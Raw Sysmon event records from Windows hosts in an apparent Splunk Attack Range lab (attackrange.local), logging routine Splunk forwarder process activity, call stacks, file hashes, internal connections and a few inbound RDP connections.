10341000x80000000000000001048730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.751{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8936-6151-057A-00000000FC01}6776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.751{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8936-6151-057A-00000000FC01}6776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.736{5EBD8912-8936-6151-057A-00000000FC01}6776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001048727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:52.743{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53256-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001048726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.205{5EBD8912-8936-6151-047A-00000000FC01}52804448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.051{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8936-6151-047A-00000000FC01}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.051{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.051{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.051{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8936-6151-047A-00000000FC01}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.051{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.051{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.051{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8936-6151-047A-00000000FC01}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.036{5EBD8912-8936-6151-047A-00000000FC01}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977363Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:54.065{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CC23C567D469A9E8D8AED03E0864593,SHA256=3AAEE98B0EB5A47584AE3B36F33C92D9C632A280628B752F02E8053F8E849F37,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977362Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:50.949{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-12364-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977361Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:50.903{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59298-false10.0.1.12-8000- 354300x8000000000000000977360Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:50.571{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51919-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977359Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:54.005{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4302MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977364Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:55.067{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ECA860D7951277F617180725DDEF472,SHA256=8FDD3D1E60F0EBCDF8C47AA65C98778B169301B971E7CDB96A5B061AA950226C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.438{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8937-6151-067A-00000000FC01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.438{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.438{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.438{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.438{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.438{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8937-6151-067A-00000000FC01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.438{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8937-6151-067A-00000000FC01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.423{5EBD8912-8937-6151-067A-00000000FC01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.066{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=457E86DE991EC7C30DB3EA7115BFE242,SHA256=304AB40067280690764419E546A4D022F1B80B31849042970159FB93093BAA5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:55.066{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E22AD9B3CDFE289165E77D4C82E5296,SHA256=D8916D61C0257E73B829355712EEF292290D33305B0347BD1F983B5D8DA3A7D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.435{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=457E86DE991EC7C30DB3EA7115BFE242,SHA256=304AB40067280690764419E546A4D022F1B80B31849042970159FB93093BAA5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.319{5EBD8912-8938-6151-077A-00000000FC01}7565192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.104{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8938-6151-077A-00000000FC01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.104{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.104{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 